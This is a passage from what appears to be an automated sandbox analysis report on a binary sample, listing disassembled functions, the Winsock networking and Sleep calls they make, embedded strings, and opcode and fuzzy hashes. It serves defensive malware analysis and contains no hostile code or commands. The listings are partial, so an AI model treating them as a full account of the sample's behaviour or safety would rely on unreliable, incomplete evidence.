                                                        • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,01023C41,00000000), ref: 0103B0C1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastconnect
                                                        • String ID:
                                                        • API String ID: 374722065-0
                                                        • Opcode ID: 9358488b3752b0c05753159668aa81495e057eb7caea5373b3f5d98a28f18f77
                                                        • Instruction ID: c98cc97f998aafa2e2808863cb3f448859c91f5787e3bbdba6ce529a67904d5c
                                                        • Opcode Fuzzy Hash: 9358488b3752b0c05753159668aa81495e057eb7caea5373b3f5d98a28f18f77
                                                        • Instruction Fuzzy Hash: 9A0188323042049BDB605A69DD44F6AF7DDFFC9268F040B54F9B8931D1D726E9508751
                                                        Function 01024950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • gethostname.WS2_32(00000000,00000040), ref: 01024AA5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: gethostname
                                                        • String ID:
                                                        • API String ID: 144339138-0
                                                        • Opcode ID: f281d0800b716a46dfe3676a9d0b99d4adfd67b99c39d5fc61cbea85c2d09a48
                                                        • Instruction ID: 9dd7c64ceb32fc782da36c224390abb371d998c010c0e50d931cacd2935de82c
                                                        • Opcode Fuzzy Hash: f281d0800b716a46dfe3676a9d0b99d4adfd67b99c39d5fc61cbea85c2d09a48
                                                        • Instruction Fuzzy Hash: E451CDB06007218BF7729E29DD897667AE4AF01715F0418BDDACACA691E7B5E444CB02
                                                        Function 0103AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • getsockname.WS2_32(?,?,00000080), ref: 0103AFD1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: getsockname
                                                        • String ID:
                                                        • API String ID: 3358416759-0
                                                        • Opcode ID: f7bdccd34e07be561def30eb58696b39a0b9769937fe945f04958f5c914402bc
                                                        • Instruction ID: 98dde901b56fffad57b3f7b5fc28d1b8da1f8c70a81972c6cff5a232d190ebf4
                                                        • Opcode Fuzzy Hash: f7bdccd34e07be561def30eb58696b39a0b9769937fe945f04958f5c914402bc
                                                        • Instruction Fuzzy Hash: 91117270808785D9EB268F5CD8027E6B3F8AFC0329F109618E5D942150F73656C58BC2
                                                        Function 0103A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0103A97E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: send
                                                        • String ID:
                                                        • API String ID: 2809346765-0
                                                        • Opcode ID: cad611bfd2ef572ab3c1cc07cc6a81a4bcef53c45f469f6522212ff6f8242be9
                                                        • Instruction ID: 3dcc619f9c00cb6bd7f9f2f56f7696a44003b444408f1ce0e4511ce52293801c
                                                        • Opcode Fuzzy Hash: cad611bfd2ef572ab3c1cc07cc6a81a4bcef53c45f469f6522212ff6f8242be9
                                                        • Instruction Fuzzy Hash: 7801A7757117109FD7148F18DC45B56FBA9EFC4720F068559EAD46B361C331AC108BD1
                                                        Function 0103AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • socket.WS2_32(?,0103B280,00000000,-00000001,00000000,0103B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0103AF67
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: socket
                                                        • String ID:
                                                        • API String ID: 98920635-0
                                                        • Opcode ID: f7028b6850aa8965a208f5a92ef10abb6109f6bea7a57f3e94ea236043d91b75
                                                        • Instruction ID: 7c20f78b70a003606f7d2fe2d45ec97af40dece39fe7be36fd61cf9294b39da7
                                                        • Opcode Fuzzy Hash: f7028b6850aa8965a208f5a92ef10abb6109f6bea7a57f3e94ea236043d91b75
                                                        • Instruction Fuzzy Hash: 85E06DB2A08221AFD650CF4CE8409ABF7ADEFC4B20F055A49B99463204C330AC408BE1
                                                        Function 0103B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • closesocket.WS2_32(?,01039422,?,?,?,?,?,?,?,?,?,?,?,01023377,013F9520,00000000), ref: 0103B04D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: closesocket
                                                        • String ID:
                                                        • API String ID: 2781271927-0
                                                        • Opcode ID: fa8c2e1359c976817b90bdeefa8b8fd968200f23a4ce70f6b479588d9ff1eecb
                                                        • Instruction ID: ca0c590460ab7c6fea2525c7eb623636a2ab4aba54cf861a7493288902e29f72
                                                        • Opcode Fuzzy Hash: fa8c2e1359c976817b90bdeefa8b8fd968200f23a4ce70f6b479588d9ff1eecb
                                                        • Instruction Fuzzy Hash: 2BD0C23470020157DA608A19C884A57BAAF7FC1614FA8CBA8F26C4A190C73BC8438A01
                                                        Function 00FD67E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ioctlsocket.WS2_32(?,8004667E,?,?,00FAAF56,?,00000001), ref: 00FD67FB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: ioctlsocket
                                                        • String ID:
                                                        • API String ID: 3577187118-0
                                                        • Opcode ID: 39779ecba55f040b81d483daf55838ed411ca01e5045570c9a123f6e27198e64
                                                        • Instruction ID: 387d8c70313301b91aa01064df8971ae75ad28fc5ce7f0a26273175db567947c
                                                        • Opcode Fuzzy Hash: 39779ecba55f040b81d483daf55838ed411ca01e5045570c9a123f6e27198e64
                                                        • Instruction Fuzzy Hash: D7C012F1109200AFC60C4724DC55B2EB6D8DB44255F01591CB04692180EB349450CA16
                                                        Function 00F731D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: af15bd69556bd8166bb28b056b27ebe883e6f1fc21e4fdd2184959b90902f01a
                                                        • Instruction ID: 250a89caa4155c3098c8fc64dda3b611584b8bce3b679820e9cd197ab3a676f3
                                                        • Opcode Fuzzy Hash: af15bd69556bd8166bb28b056b27ebe883e6f1fc21e4fdd2184959b90902f01a
                                                        • Instruction Fuzzy Hash: 7A31B5B0904305DBCB50EFB8D98469EBBF0BF44348F01886EE898A7341E7349A44DF52
                                                        Function 012FB160 Relevance: 1.3, APIs: 1, Instructions: 9sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 4e0f78d8b5c49656cdc8c8722fa346db2e7006baf8b5e22a977008957ca65778
                                                        • Instruction ID: e71c30ce1574668eaf7fc3b0ca1f01a78c499e5d6c521b07964dce2e3452ae89
                                                        • Opcode Fuzzy Hash: 4e0f78d8b5c49656cdc8c8722fa346db2e7006baf8b5e22a977008957ca65778
                                                        • Instruction Fuzzy Hash: B8C04CE0C5474446D740BE38C54A11E79E47B41104FC11B68DD84A6195F628931C8697

                                                        Non-executed Functions

                                                        Function 00F84940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                        • API String ID: 0-122532811
                                                        • Opcode ID: 06ecf094f1374101bfe30b35a4e63a9a5d72b82ad9ffe76e459a56434a81f88c
                                                        • Instruction ID: cfb104601099a6b6a118ad6f480cb3c565bf19d851cd17da239c8751dc8f6343
                                                        • Opcode Fuzzy Hash: 06ecf094f1374101bfe30b35a4e63a9a5d72b82ad9ffe76e459a56434a81f88c
                                                        • Instruction Fuzzy Hash: 8F42F871B08701AFD708DE28CC51BABB6EAFBC4704F048A2DF54D97291E775B9049B92
                                                        Function 012FE030 Relevance: 10.8, APIs: 2, Strings: 3, Instructions: 2082COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: localeconv
                                                        • String ID: $d$nil)
                                                        • API String ID: 3737801528-394766432
                                                        • Opcode ID: 0f1d060fed304afe4cc4861cf3c077cf68bad963797917e823eb87d115020ed9
